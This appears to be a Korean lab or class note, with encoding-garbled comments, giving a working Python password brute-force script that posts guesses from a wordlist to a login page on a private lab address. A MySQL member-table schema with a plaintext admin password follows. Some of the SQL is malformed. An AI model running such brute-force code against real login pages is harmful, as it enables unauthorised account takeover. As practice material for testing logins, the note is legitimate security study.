2024³â 2¿ù 5ÀÏ
kali
cd 2024py
nano 3.py
import requests
from bs4 import BeautifulSoup
def main(target):
print("attack")
#wordpress
log="admin"
pwd="123456"
#dvwa
username="admin"
password="123456"
with open('pass.txt','r') as file:
#content = file.read()
#print(content)
lines=file.readlines()
for line in lines:
print(line.strip())
id="admin"
pw=line.strip()
payload = {"id":"admin","pw":line.strip()}
print(payload)
response = requests.post(target,payload)
chk = response.text.find('alert(\"pass\")')
#print(response.text.find('alert(\"pass\")')
#print(response.text,dir(response))
if response.status_code == 200 and chk > 0: #100,200,300,403,404,500
soup = BeautifulSoup(response.text,'html.parser')
print(soup)
break
if __name__ == "__main__":
target="http://192.168.1.162/login_chk.php" #get method
main(target)
CREATE TABLE IF NOT EXISTS `member` (
`no` int(11) NOT NULL AUTO_INCREMENT,
`id` varchar(50) CHARACTER SET utf8 NOT NULL,
`pw` varchar(50) CHARACTER SET utf8 NOT NULL,
`name` varchar(50) CHARACTER SET utf8 NOT NULL,
`level` int(11) NOT NULL DEFAULT '9',
`last_login` int(11) datetime NOT NULL,
`failed_login` int(11) NOT NULL DEFAULT '0',
`regdate` datetime NOT NULL,
PRIMARY KEY (`no`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=1 ;
--
-- Å×À̺íÀÇ ´ýÇÁ µ¥ÀÌÅÍ `member`
--
INSERT INTO `member` (`id`, `pw`, `name`, `level`,`last_login`,`failed_login`, `regdate`) VALUES
('admin', 'admin1234', 'admin', 9, '2024-02-05 00:00:00',0,'2024-02-05 14:05:00');
SELECT failed_login, last_login FROM member WHERE id = (:id) LIMIT 1